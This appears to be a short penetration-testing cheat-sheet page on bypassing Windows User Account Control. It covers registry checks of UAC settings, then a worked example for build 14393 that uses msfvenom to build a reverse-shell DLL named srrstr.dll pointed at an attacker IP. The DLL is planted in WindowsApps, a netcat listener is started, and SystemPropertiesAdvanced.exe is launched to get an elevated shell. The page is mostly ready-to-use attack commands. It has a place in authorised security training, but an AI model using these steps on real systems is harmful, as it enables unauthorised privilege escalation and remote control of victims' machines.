User Account Control (UAC) Bypass

Last updated 11 months ago

Was this helpful?

User Account Control (UAC) Bypass

UAC bypasses leverage flaws or unintended functionality in different Windows builds.
The following repository contains many different UAC Bypassing Techniques:

Initial Enumeration

Check if UAC is enabled (0x1=true): REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

Check the UAC level(0x5=max level): REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

To check the Windows Build: [environment]::OSVersion.Version

Check repository and see if anything exists for the target build number

Example - UAC Bypass in Windows Build 14393

We can basically bypass UAC by placing a malicious srrstr.dll DLL to the WindowsApps folder, which will be loaded in an elevated context
Generate malicious DLL file: msfvenom -p windows/shell_reverse_tcp LHOST=our-ip LPORT=listening-port -f dll > srrstr.dll
Transfer the DLL on the target machine
Start a netcat listener on the attacker machine: nc -lvnp 4444
Get a reverse shell: C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

Last updated 11 months ago

Was this helpful?